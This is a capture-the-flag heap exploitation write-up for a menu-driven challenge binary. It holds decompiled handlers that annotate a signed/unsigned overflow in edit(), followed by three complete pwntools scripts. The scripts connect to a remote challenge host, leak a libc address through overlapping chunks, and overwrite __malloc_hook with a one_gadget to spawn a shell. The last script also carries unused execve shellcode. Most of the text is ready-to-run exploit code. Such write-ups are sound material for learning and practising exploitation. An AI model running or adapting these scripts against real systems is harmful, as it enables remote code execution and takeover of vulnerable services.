IDA pseudocode of the challenge binary (menu handlers only; the globals `ptr` — a table of chunk pointers — and `Size` are declared elsewhere and not shown)
1.menu
2.ADD
/*
 * Menu "ADD": allocate one fixed-size chunk (malloc(0x60)) into the first
 * empty slot of the global pointer table `ptr` and record 96 in `Size`.
 *
 * Review notes on the decompiled code (this is the vulnerable target, the
 * listing is kept as evidence rather than "fixed"):
 *  - The slot scan runs i = 0..9 and stops at the first NULL entry.  When no
 *    slot is free the loop ends with i == 10, but the guard below tests
 *    i == 11, so it never fires; v2 is then used as an index without ever
 *    having been assigned.
 *  - malloc()'s return value is stored without a NULL check.
 *  - Every allocation is 0x60 bytes, so all chunks share one size class and
 *    sit back to back; the exploits below rely on that (0x71 size fields,
 *    overflowing from one chunk into the next chunk's header).
 */
unsigned __int64 add()
{
    unsigned int i; // [rsp+8h] [rbp-1018h]
    unsigned int v2; // [rsp+Ch] [rbp-1014h]  -- only assigned when a free slot is found
    char v3[4096]; // [rsp+10h] [rbp-1010h] BYREF  -- zeroed below, otherwise unused
    unsigned __int64 v4; // [rsp+1018h] [rbp-8h]  -- saved stack canary
    v4 = __readfsqword(0x28u);
    memset(v3, 0, sizeof(v3));
    for ( i = 0; i <= 9; ++i )
    {
        if ( !*(&ptr + i) )
        {
            v2 = i;
            break;
        }
    }
    if ( i == 11 ) // unreachable: i is at most 10 after the loop above
    {
        puts("wrong");
        exit(0);
    }
    *(&ptr + v2) = malloc(0x60uLL);
    Size[v2] = 96;
    puts("Done");
    return __readfsqword(0x28u) ^ v4; // compiler-inserted canary check
}
3.EDIT
/*
 * Menu "EDIT": read up to `nbytes` bytes from stdin into ptr[nbytes_4].
 *
 * Core bug (the signed/unsigned note under this listing): the size is parsed
 * with "%d" into a signed int and bounded with `nbytes <= 96`, but read()
 * receives `(unsigned int)nbytes`.  A negative value such as -1 passes the
 * check and becomes 0xFFFFFFFF, so read() is allowed to write far past the
 * 0x60-byte chunk into the following chunk's header -- this is the heap
 * overflow every exploit below triggers with edit(idx, -1, ...).
 *
 * Secondary: the index nbytes_4 is only tested for a non-NULL table entry,
 * never range-checked against the size of `ptr`.
 */
unsigned __int64 edit()
{
    int nbytes; // [rsp+0h] [rbp-10h] BYREF  -- signed: negative sizes pass the check
    unsigned int nbytes_4; // [rsp+4h] [rbp-Ch] BYREF  -- slot index, unbounded
    unsigned __int64 v3; // [rsp+8h] [rbp-8h]  -- saved stack canary
    v3 = __readfsqword(0x28u);
    puts("Index:");
    __isoc99_scanf("%d", &nbytes_4);
    puts("Size:");
    __isoc99_scanf("%d", &nbytes);
    if ( nbytes <= 96 ) // signed comparison: -1 <= 96 is true
    {
        if ( *(&ptr + nbytes_4) )
        {
            puts("Content:");
            read(0, *(&ptr + nbytes_4), (unsigned int)nbytes); // -1 -> 0xFFFFFFFF bytes
        }
        else
        {
            puts("wrong");
        }
    }
    else
    {
        puts("wrong!");
    }
    return __readfsqword(0x28u) ^ v3;
}
Signed/unsigned mismatch in edit(): the size is checked as a signed int (`nbytes <= 96`) but passed to read() as `(unsigned int)nbytes`, so a negative size such as -1 passes the check and becomes 0xFFFFFFFF — an unbounded heap overflow starting at the chosen chunk.
4.Show
/*
 * Menu "SHOW": printf("%s") of the chunk in slot v1.
 *
 * The index is never range-checked; only the non-NULL-ness of the table entry
 * is tested.  Nothing distinguishes a slot whose memory has been handed back
 * to the allocator through another chunk's forged size, which is what the
 * exploits below use to print a main_arena pointer out of slot 2.
 */
unsigned __int64 show()
{
    unsigned int v1; // [rsp+4h] [rbp-Ch] BYREF  -- slot index, unbounded
    unsigned __int64 v2; // [rsp+8h] [rbp-8h]  -- saved stack canary
    v2 = __readfsqword(0x28u);
    puts("Index:");
    __isoc99_scanf("%d", &v1);
    if ( *(&ptr + v1) )
        printf("Content: %s\n", (const char *)*(&ptr + v1)); // stops at the first NUL byte
    return __readfsqword(0x28u) ^ v2;
}
5.delete
/*
 * Menu "DELETE": free ptr[v1] and clear both the slot and its Size entry.
 *
 * The bound check accepts v1 in 0..11 although add() only ever fills slots
 * 0..9, so indices 10 and 11 reach past what add() populates (presumably past
 * the table itself; its declaration is not visible here).  Because the slot
 * is NULLed after free(), a plain double free via this menu is not possible;
 * the exploits instead corrupt chunk headers through edit()'s overflow.
 */
unsigned __int64 delete()
{
    unsigned int v1; // [rsp+4h] [rbp-Ch] BYREF  -- slot index
    unsigned __int64 v2; // [rsp+8h] [rbp-8h]  -- saved stack canary
    v2 = __readfsqword(0x28u);
    puts("Index:");
    __isoc99_scanf("%d", &v1);
    if ( v1 > 0xB ) // off by two relative to the 10 slots add() fills
    {
        puts("wrong");
        exit(0);
    }
    free(*(&ptr + v1)); // free(NULL) is a no-op for empty slots
    *(&ptr + v1) = 0LL;
    Size[v1] = 0;
    return __readfsqword(0x28u) ^ v2;
}
EXP — three exploit scripts follow, all written against libc-2.23.so: an unsorted-bin libc leak through overlapping chunks, then a fastbin attack on __malloc_hook with a one_gadget.
from pwn import *
# Target selection: uncomment the process() line to debug the binary locally.
# io = process("./pwn")
HOST, PORT = "106.54.163.94", 20017
io = remote(HOST, PORT)
elf = ELF("./pwn")
# The libc shipped with the challenge; the -88-0x10 arithmetic below assumes this build.
libc = ELF("./libc-2.23.so")
def dbg():
    """Attach gdb to the live target, then block so breakpoints can be placed."""
    gdb.attach(io)
    pause()
def cmd(choice):
    """Wait for the menu prompt and select entry `choice`."""
    io.sendlineafter(">>", str(choice))
def add():
    """Menu 1: allocate a 0x60-byte chunk into the next free slot."""
    cmd(1)
def delete(index):
    """Menu 2: free the chunk in slot `index`."""
    cmd(2)
    io.sendlineafter("Index:", str(index))
def show(index):
    """Menu 3: print the contents of slot `index` (printf %s)."""
    cmd(3)
    io.sendlineafter("Index:", str(index))
def edit(index, size, content):
    """Menu 4: write `content` into slot `index` with the given size.

    A negative `size` slips past the binary's signed `<= 96` check, which is
    what turns this into the heap overflow used below.  The content is sent
    raw (no trailing newline).
    """
    cmd(4)
    io.sendlineafter("Index:", str(index))
    io.sendlineafter("Size:", str(size))
    io.sendafter("Content:", content)
# ---- Stage 1: leak a libc address -----------------------------------------
# Four back-to-back 0x70 chunks (user size 0x60) in slots 0..3.
add()#0
add()#1
add()#2
add()#3
# Overflow from slot 0: 0x60 bytes of filler, then chunk 1's prev_size (0) and
# a forged size 0xe1, so chunk 1 appears to span chunks 1 and 2.  Size -1 gets
# through edit()'s signed `<= 96` check and reaches read() as 0xFFFFFFFF.
payload=b'A'*0x60+p64(0)+p64(0xe1)
edit(0,-1,payload)
# Freeing the forged 0xe0 chunk: on glibc 2.23 that size is above the fastbin
# range, so it is expected to land in the unsorted bin with fd/bk into main_arena.
delete(1)
# malloc(0x60) is carved from that unsorted chunk; the 0x70 remainder (chunk
# 2's memory) stays in the bin, so slot 2 now contains an arena pointer.
add()#1
# Slot 2 was never freed from the program's point of view, so show() prints it.
show(2)
# fd == main_arena+88 on this libc build; __malloc_hook sits 0x10 below main_arena.
malloc_hook=u64(io.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))-88-0x10
print('malloc_hook:'+hex(malloc_hook))
base=malloc_hook-libc.sym['__malloc_hook']
# one_gadget offset for libc-2.23; requires [rsp+0x30] == NULL when the hook fires
# (constraints are listed in the third script's notes).
onegadget=base+0x4527a
# ---- Stage 2: fastbin attack on __malloc_hook ------------------------------
delete(1)  # chunk 1 (real size 0x71) -> 0x70 fastbin
# Same overflow again: restore size 0x71 and point chunk 1's fd at a fake chunk
# 0x23 bytes below __malloc_hook (the usual 2.23 trick: a 0x7f byte above the
# hook serves as the fake size field -- confirm in gdb against the target libc).
edit(0,-1,b'A'*0x60+p64(0)+p64(0x71)+p64(malloc_hook-0x23))
add()#1  pops chunk 1; the fastbin head is now the fake chunk
add()#4  returns the fake chunk, i.e. a user pointer 0x13 bytes below __malloc_hook
# 0x13 bytes of padding reach __malloc_hook exactly; overwrite it with the gadget.
edit(4,-1,b'\x00'*0x13+p64(onegadget))
add()  # the next malloc() goes through __malloc_hook -> one_gadget -> shell
io.interactive()
from pwn import *
# Verbose pwntools logging so every send/recv is visible while the heap layout is debugged.
context.os = 'linux'
context.arch = 'amd64'
context.log_level = 'debug'

# io = process("./pwn")   # local variant
TARGET = ("106.54.163.94", 20017)
io = remote(*TARGET)
elf = ELF("./pwn")
libc = ELF("./libc-2.23.so")  # the 0x3c4b78 constant below is specific to this build
def add():
    """Menu 1: allocate a 0x60-byte chunk into the next free slot."""
    io.recvuntil(">> ")
    io.sendline("1")
def delete(idx):
    """Menu 2: free the chunk in slot `idx`."""
    io.recvuntil(">> ")
    io.sendline("2")
    io.recvuntil("Index:")
    io.sendline(str(idx))
def show(idx):
    """Menu 3: print the contents of slot `idx`."""
    io.recvuntil(">> ")
    io.sendline("3")
    io.recvuntil("Index:")
    io.sendline(str(idx))
def edit(idx, size, content):
    """Menu 4: write `content` into slot `idx` with the given size.

    Note that the content is sent with sendline(), so one extra "\n" byte
    follows every payload; the callers below must tolerate that byte.
    """
    io.recvuntil(">> ")
    io.sendline("4")
    io.recvuntil("Index:")
    io.sendline(str(idx))
    io.recvuntil("Size:")
    io.sendline(str(size))
    io.recvuntil("Content:")
    io.sendline(content)
def attach():
    """Attach gdb to the target and wait so breakpoints can be set."""
    gdb.attach(io)
    pause()
# leak libc_base
# ---- Stage 1: libc leak (same chunk-overlap trick as the first script) ----
add() #0
add() #1
add() #2
add() #3
# Overflow slot 0 to set chunk 1's size to 0xe1 (0x70*2 + PREV_INUSE): chunk 1
# now appears to cover chunks 1 and 2.  Size -1 passes edit()'s signed check
# and reaches read() as 0xFFFFFFFF.  NOTE(review): this edit() helper uses
# sendlineafter(), so a trailing "\n" is also written; here it lands on chunk
# 1's first user byte, which is harmless.
edit(0, -1, b'\x00'*0x68 + p64(0x70*2+1))
delete(1)  # 0xe0 chunk: above the fastbin range on 2.23 -> unsorted bin
add() #1   # re-split: chunk 1 comes back; the remainder (chunk 2's memory) keeps the arena pointer
show(2)
# 0x3c4b78 == offset of main_arena+88 in this libc-2.23 build (the first script
# derives the same address as __malloc_hook + 0x10 + 88).
libc_base = u64(io.recvuntil("\x7f")[-6:].ljust(8, b'\x00')) - 0x3c4b78
print("[+]libc base = " + str(hex(libc_base)))
malloc_hook = libc_base + libc.symbols['__malloc_hook']
# Fake 0x70 fastbin chunk whose size byte is the 0x7f just above __malloc_hook
# (standard 2.23 layout; verify in gdb if the target libc differs).
fake_chunk = malloc_hook - 0x23
# one_gadget offsets for libc-2.23 and their constraints (see the third script):
# 0x45226 rax==NULL, 0x4527a [rsp+0x30]==NULL, 0xf03a4 [rsp+0x50]==NULL, 0xf1247 [rsp+0x70]==NULL
sh = [0x45226, 0x4527a, 0xf03a4, 0xf1247]
# ---- Stage 2: fastbin attack ----------------------------------------------
delete(1)  # chunk 1 (real size 0x71) -> 0x70 fastbin
# Restore size 0x71 and point chunk 1's fd at fake_chunk.  The extra "\n" from
# sendlineafter() ends up in the freed chunk's bk field (unused for fastbins).
edit(0, -1, b'\x00'*0x68 + p64(0x71) + p64(fake_chunk))
add() #1   # takes chunk 1 back; fastbin head is now fake_chunk
add() #4 fack_chunk   # returns fake_chunk -> user pointer at __malloc_hook - 0x13
# 0x13 bytes of padding reach __malloc_hook; size 0x30 is within edit()'s limit.
# NOTE(review): the appended "\n" lands at __malloc_hook+8 (the start of
# main_arena).  The hook is consulted before the arena is used, so this is
# expected to be harmless -- confirm on the target if this variant misbehaves.
edit(4, 0x30, b'\x00'*0x13 + p64(libc_base + sh[1])) # modify
add() #trigger   # malloc() -> __malloc_hook -> one_gadget
io.interactive()
#encoding = utf-8
from pwn import *
from LibcSearcher import *
context(log_level='debug', os='linux', arch='amd64')

# Target selection: 1 = local binary under the bundled loader/libc,
# 2 = local binary as-is, anything else = the remote challenge instance.
local = 3
if local == 1:
    sh = process([b"./ld.so", b"./pwn"], env={"LD_PRELOAD": b"./libc.so.6"})
elif local == 2:
    sh = process("./pwn")
else:
    sh = remote('106.54.163.94', 20017)

elf = ELF('./pwn')
libc = ELF('./libc-2.23.so')  # offsets below (0x3c4b78, 0x4527a) belong to this build
def dbg():
    """Attach gdb to the target, then wait for the operator."""
    gdb.attach(sh)
    pause()
# Short I/O helpers around the pwntools tube `sh`, written as plain functions.

def s(data):
    """Raw send."""
    return sh.send(data)

def sa(text, data):
    """Send `data` once `text` has been received."""
    return sh.sendafter(text, data)

def sl(data):
    """Send `data` followed by a newline."""
    return sh.sendline(data)

def sla(text, data):
    """Send `data` plus newline once `text` has been received."""
    return sh.sendlineafter(text, data)

def r(num):
    """Receive exactly up to `num` bytes."""
    return sh.recv(num)

def ru(text):
    """Receive until `text` is seen."""
    return sh.recvuntil(text)

def uu32():
    """Leak helper: read up to a byte 0xf7 and unpack the last 4 bytes as a 32-bit address.

    The delimiter is a str literal; pwntools coerces it to bytes, but an
    explicit b"\\xf7" would avoid relying on that.
    """
    return u32(sh.recvuntil("\xf7")[-4:].ljust(4, b"\x00"))

def uu64():
    """Leak helper: read up to a byte 0x7f and unpack the last 6 bytes as a 64-bit address."""
    return u64(sh.recvuntil("\x7f")[-6:].ljust(8, b"\x00"))

def lg(s):
    """Log the value of the module-level variable named by `s` in green hex.

    NOTE(review): uses eval() on the supplied name; only ever called with
    literal variable names in this script.
    """
    return sh.success('\033[32m%s -> 0x%x\033[0m' % (s, eval(s)))

def lgl(s, value):
    """Log an explicit `value` under label `s` in green hex (no eval)."""
    return sh.success('\033[32m%s -> 0x%x\033[0m' % (s, value))
# Canned shellcode from the author's template; unused by this exploit (the
# binary is taken over via __malloc_hook + one_gadget instead).
# NOTE(review): these are str literals holding bytes >= 0x80.  pwntools coerces
# str to bytes when sending, but bytes literals (b"...") would be unambiguous.
sh_x86_18="\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x86_20="\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x64_21="\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05"
#https://www.exploit-db.com/shellcodes
#------------------------------------------------------------------------------------------------------#
# one_gadget output for libc-2.23.so.  Each gadget is an execve("/bin/sh", ...)
# and only works when its constraint holds at the moment __malloc_hook is
# invoked; the script below uses 0x4527a ([rsp+0x30] == NULL).
'''
0x45226 execve("/bin/sh", rsp+0x30, environ)
constraints:
rax == NULL
0x4527a execve("/bin/sh", rsp+0x30, environ)
constraints:
[rsp+0x30] == NULL
0xf03a4 execve("/bin/sh", rsp+0x50, environ)
constraints:
[rsp+0x50] == NULL
0xf1247 execve("/bin/sh", rsp+0x70, environ)
constraints:
[rsp+0x70] == NULL
'''
def add():
    """Menu 1: the binary always does malloc(0x60) into the next free slot."""
    sh.sendlineafter('>> ', b'1')
def delete(idx):
    """Menu 2: free the chunk in slot `idx`."""
    sh.sendlineafter('>> ', b'2')
    sh.sendlineafter('Index:', str(idx))
def show(idx):
    """Menu 3: print the contents of slot `idx`."""
    sh.sendlineafter('>> ', b'3')
    sh.sendlineafter('Index:', str(idx))
def edit(idx, size, content):
    """Menu 4: write `content` into slot `idx` with the given size.

    The content is sent raw (sendafter, no trailing newline), so payloads are
    written byte-exact.  A negative `size` bypasses the binary's signed check.
    """
    sh.sendlineafter('>> ', b'4')
    sh.sendlineafter('Index:', str(idx))
    sh.sendlineafter('Size:', str(size))
    sh.sendafter('Content:', content)
# ---- Stage 1: libc leak ---------------------------------------------------
# Six 0x70 chunks: slots 0..2 drive the leak, slots 3/4 drive the fastbin
# attack; slot 5 is allocated but never touched (presumably padding after
# chunk 4).
add() # 0
add() # 1
add() # 2
add() # 3
add() # 4
add() # 5
# Forged size 0xe1 (0x70*2 + PREV_INUSE) for chunk 1 so it appears to span chunks 1 and 2.
pld = b'\x00' * 0x68 + p64(0x70 * 2 + 1)
edit(0, -1, pld)   # size -1 passes edit()'s signed check; read() gets 0xFFFFFFFF
delete(1)          # 0xe0 chunk: above the fastbin range on 2.23 -> unsorted bin
add() # 1          # re-split; the 0x70 remainder (chunk 2's memory) keeps fd/bk = main_arena+88
show(2)
libc_base = uu64() - 0x3c4b78   # main_arena+88 offset in this libc-2.23 build
lg('libc_base')
ogg = libc_base + 0x4527a       # one_gadget: needs [rsp+0x30] == NULL (see the notes above)
malloc_hook = libc_base + libc.sym['__malloc_hook']
# Fake 0x70 fastbin chunk; its size byte is the 0x7f just above __malloc_hook
# on the standard 2.23 layout (verify in gdb if this fails).
fake_chunk = malloc_hook - 0x20 - 3
lg('malloc_hook')
lg('fake_chunk')
# ---- Stage 2: fastbin attack on __malloc_hook -----------------------------
delete(4)          # chunk 4 (size 0x71) -> 0x70 fastbin
pld = b'\x00' * 0x68 + p64(0x71) + p64(fake_chunk)   # keep size 0x71, overwrite fd
edit(3, -1, pld)   # overflow from chunk 3 into chunk 4's header and fd
add() # 4          # pops chunk 4; the fastbin head is now fake_chunk
add() # 6          # returns fake_chunk -> user pointer at __malloc_hook - 0x13
pld = b'\x00' * (0x10 + 3) + p64(ogg)   # 0x13 bytes of padding reach __malloc_hook
edit(6, -1, pld)   # sendafter(): no trailing newline, unlike the second script
# dbg()
add()              # malloc() -> __malloc_hook -> one_gadget
sh.interactive()